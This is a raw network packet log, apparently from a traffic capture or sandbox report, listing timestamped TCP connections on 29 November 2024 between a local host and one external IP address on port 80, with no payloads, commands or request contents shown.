                                                                                Nov 29, 2024 01:52:51.253834009 CET804979972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.253942013 CET4979980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.253979921 CET4979980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.293626070 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.293759108 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.341556072 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.341628075 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.364219904 CET4980180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.373900890 CET804979972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.457561016 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.484266043 CET804980172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.484380960 CET4980180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.484558105 CET4980180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.553551912 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.553623915 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.604692936 CET804980172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.801568031 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.801636934 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.839320898 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.839407921 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.921686888 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959434986 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959448099 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959527969 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959654093 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959670067 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959784031 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.959793091 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.068810940 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.070473909 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.070501089 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.190579891 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.219118118 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.339250088 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.339334011 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.339449883 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.339513063 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.339584112 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.339601040 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.459394932 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.459688902 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.459745884 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.459755898 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.459805965 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.459867954 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.459909916 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460033894 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460064888 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460139990 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.460165024 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460190058 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460253954 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.460290909 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460328102 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.460386038 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.579835892 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.579879045 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.579907894 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.579921007 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.579922915 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.579952002 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.579969883 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.579991102 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.621592999 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.621721983 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.668721914 CET804980172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.668893099 CET4980180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.668958902 CET4980180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.741715908 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.741857052 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.784785986 CET4980380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.788861990 CET804980172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.789539099 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.789596081 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.904808998 CET804980372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:52.904885054 CET4980380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.905103922 CET4980380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:52.905503988 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.001589060 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.001671076 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.025291920 CET804980372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.253772020 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.254467964 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.293814898 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.294495106 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.374711990 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414551020 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414716959 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414726973 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414736032 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414849043 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414859056 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414964914 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.414983034 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.523556948 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.526468039 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.610239029 CET4980280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.730093002 CET804980272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.781455994 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.901459932 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:53.901525021 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.901676893 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.901699066 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.901760101 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:53.901781082 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.022779942 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.023957014 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.023967028 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.023974895 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.023983955 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.023992062 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.023999929 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.024008989 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.024019957 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.024028063 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.024038076 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.024043083 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.024045944 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.024070978 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.024084091 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.024105072 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.144243956 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.144264936 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.144323111 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.144361973 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.144371986 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.144408941 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.144428968 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.150824070 CET804980372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.150875092 CET4980380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.150935888 CET4980380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.185581923 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.185689926 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.253906012 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.270840883 CET804980372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.305522919 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.305697918 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.349566936 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.349862099 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.373902082 CET804980672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.374212980 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.374226093 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.469573975 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.494227886 CET804980672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.561608076 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.561894894 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.813647032 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.813698053 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.872448921 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.872545004 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:54.934815884 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992723942 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992736101 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992743969 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992753983 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992819071 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992827892 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.992955923 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.993093967 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:54.993141890 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.102607965 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.102669001 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.102741003 CET4980480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.222701073 CET804980472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.253010035 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.373059034 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.377204895 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.377326965 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.377355099 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.377420902 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.377444983 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497334957 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497412920 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497464895 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497512102 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497587919 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497597933 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497634888 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497662067 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497665882 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497678041 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497730017 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497730970 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497751951 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497773886 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497803926 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497853041 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497863054 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497914076 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.617743015 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617753983 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617789030 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617830992 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.617840052 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617892027 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.661550999 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.664544106 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.734934092 CET804980672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.737832069 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.740112066 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.781635046 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.781749010 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.825683117 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.825759888 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.860033989 CET804980672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.871320009 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.945700884 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.991463900 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.991535902 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.008167028 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.037568092 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.038500071 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.128424883 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.289621115 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.289683104 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.368863106 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.368962049 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.409827948 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489003897 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489013910 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489135027 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489217043 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489224911 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489290953 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489304066 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.607901096 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.607974052 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.609394073 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.729347944 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.845982075 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.965866089 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.965943098 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966182947 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966233969 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966339111 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966414928 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086314917 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086333036 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086343050 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086420059 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086468935 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086477995 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086504936 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086556911 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086570978 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086644888 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086653948 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086677074 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086709023 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086823940 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086867094 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086875916 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086929083 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.130007029 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.130059958 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.138895035 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.206401110 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206456900 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.206490993 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206502914 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206554890 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.206593990 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206643105 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.249520063 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.249609947 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.249650955 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.257900000 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.258738995 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.369539022 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.369683027 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.377980947 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.378050089 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.378237009 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.413584948 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.413701057 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.498155117 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.533648968 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.535109997 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.697585106 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.700772047 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.901583910 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.901670933 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.957139015 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.957223892 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.021635056 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078257084 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078418970 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078541040 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078551054 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078558922 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078567982 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.196140051 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.196203947 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.196280003 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.316155910 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.426841021 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.546736956 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.548722982 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.548974037 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.549088955 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.549156904 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.549177885 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.608347893 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.608525038 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.608525038 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.668818951 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.668961048 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669329882 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669338942 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669425011 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669434071 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669486046 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669488907 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669517040 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669537067 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669567108 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669569969 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669605970 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669612885 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669651985 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669671059 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669708967 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.669723034 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.669759989 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.722594976 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.728482962 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789643049 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789691925 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789762020 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.789809942 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789836884 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.789979935 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.833667994 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.836750984 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.843061924 CET804981872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.844504118 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.844618082 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.953618050 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.955338001 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.964797974 CET804981872.52.178.23192.168.2.4
